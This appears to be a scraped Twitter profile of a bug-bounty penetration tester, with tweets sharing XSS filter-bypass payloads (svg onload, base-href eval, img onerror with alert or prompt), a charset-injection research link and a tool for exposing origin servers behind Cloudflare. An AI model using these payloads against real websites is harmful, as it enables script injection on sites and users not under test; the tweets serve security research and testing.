0xShohel
@shohel_96
eCPPT, eWPTX, CEH | Penetration Tester | Vulnerability Assessment
ID: 1356503373751586816
02-02-2021 07:24:11
2,2K Tweet
253 Followers
1,1K Following
After 2 days of struggling, Bypassed a strong XSS filter on one of the private program. [ No '>' was allowed , no Html tags, Character length 35 ] XSS Payload used :- <svg onload="alert(1)" <="" svg="" XSS Payloads #BugBountyTips #BugBounty
MY LAB PAYLOADS ๐๐๐๐๐๐๐๐๐๐๐๐๐๐๐๐๐๐๐๐๐๐๐ XSS PAYLOADS <base href="alert(1)" onfocus="a = /\/([^/]+)$/.exec(baseURI); eval(a[1]);" tabindex=1 style="display:block" autofocus></base> <img%20hrEF="x"%20sRC="data:x,"%20oNLy=1%20oNErrOR=prompt`1`>
XSS on any website with missing charset information? ๐ฅ Attackers may use the ISO-2022-JP character encoding to inject arbitrary JavaScript code into a website. Read more in Sonar Research's recent blog post: sonarsource.com/blog/encoding-โฆ #appsec #security #vulnerability #RedTeam
Naeem Ahmed Sayed ๐ง๐ฉ Deepak bug_vs_me Microsoft Research github.com/SeifElsallamy/โฆ
Alhamdulillah! I received a bounty on the ็ฌใ็ทใฎๅพๅ่ platform for identifying a Security Misconfiguration vulnerability! #bugbounty #penetrationtest #yogosha #cybersecurity
I'm happy to say that the DOMLogger++ workshop created for GreHack is now available ๐ I've written it in a way that it can serve as documentation. I hope it helps you understand how to use it properly! Website: domloggerpp-workshop.mizu.re:5173 GitHub: github.com/kevin-mizu/domโฆ
Cloudflare hides 19.3% of all websitesโbut not perfectly. CloudRip scans subdomains to find IPs not behind Cloudflare protection, exposing the real origin server: hackers-arise.com/web-app-hackinโฆ OccupytheWeb